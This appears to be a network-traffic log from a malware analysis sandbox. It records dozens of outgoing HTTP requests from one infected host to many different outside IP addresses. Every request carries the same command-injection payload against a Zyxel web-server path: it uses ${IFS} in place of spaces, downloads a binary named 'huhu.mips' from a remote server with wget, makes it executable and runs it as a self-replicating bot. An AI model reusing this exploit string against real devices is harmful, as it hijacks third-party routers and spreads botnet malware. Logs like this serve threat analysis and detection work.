                                                  Jan 19, 2024 18:23:01.532074928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  181192.168.2.135484854.250.43.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532126904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  182192.168.2.135528871.64.0.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532210112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  183192.168.2.1360866105.134.11.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532228947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  184192.168.2.1351668113.246.150.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532305956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  185192.168.2.1342312145.176.84.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532377958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  186192.168.2.135513271.189.229.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532483101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  187192.168.2.134840089.223.3.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532505035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  188192.168.2.135385250.80.71.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532572985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  189192.168.2.1356774129.57.16.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532608986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  190192.168.2.1352900160.181.54.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532705069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  191192.168.2.1349494221.43.253.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532747030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  192192.168.2.134131260.77.142.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532826900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  193192.168.2.13394668.98.143.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532902956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  194192.168.2.133316650.246.179.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.532946110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  195192.168.2.1355006202.167.217.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533021927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  196192.168.2.1336752126.80.231.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533034086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  197192.168.2.133802832.216.27.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533104897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  198192.168.2.1353082153.228.252.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533150911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  199192.168.2.133625024.104.90.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533198118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  200192.168.2.1342618223.141.211.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533271074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  201192.168.2.1358094192.210.9.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533307076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  202192.168.2.135521631.52.152.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533380032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  203192.168.2.1341050174.66.147.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533463955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  204192.168.2.1353748139.210.251.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533516884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  205192.168.2.1354764154.216.147.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533651114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  206192.168.2.1348078137.100.205.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.533706903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  207192.168.2.1350626199.228.121.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534267902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  208192.168.2.133676450.98.91.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534307003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  209192.168.2.1343616118.94.184.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534372091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  210192.168.2.1340408139.73.233.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534461975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  211192.168.2.1338638216.44.23.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534531116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  212192.168.2.134099881.82.241.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534579039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  213192.168.2.1337916208.200.118.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534626007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  214192.168.2.1332808165.143.210.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534692049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  215192.168.2.1353370197.117.87.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534774065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  216192.168.2.1344390105.228.51.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534828901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  217192.168.2.134678634.8.23.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.534873009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  218192.168.2.1341154213.243.34.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535001993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  219192.168.2.1343666132.102.73.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535039902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  220192.168.2.135641664.58.53.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535096884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  221192.168.2.1358462211.99.191.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535171032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  222192.168.2.1341834126.144.30.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535253048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  223192.168.2.1341124209.17.249.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535296917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  224192.168.2.1352366202.245.47.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535360098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  225192.168.2.134211413.70.149.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535429001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  226192.168.2.133742649.153.151.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535504103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  227192.168.2.1355044223.179.36.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535526037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  228192.168.2.135194063.83.88.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535615921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  229192.168.2.134627440.222.104.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535649061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  230192.168.2.1340146110.249.45.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535706043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  231192.168.2.1336014170.179.237.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535752058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  232192.168.2.133600631.19.114.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535815954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  233192.168.2.135011438.218.36.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535877943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  234192.168.2.134127650.2.242.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.535943985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  235192.168.2.1339984200.212.207.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536010981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  236192.168.2.134886650.38.106.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536077976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  237192.168.2.1341096142.209.160.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536088943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  238192.168.2.1353752164.94.53.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536163092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  239192.168.2.1354442222.12.29.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536226988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  240192.168.2.133789034.124.163.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536292076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  241192.168.2.1353534119.235.113.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536331892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  242192.168.2.134230017.65.110.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.536365032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  243192.168.2.1357320212.130.165.190443
                                                  TimestampBytes transferredDirectionData
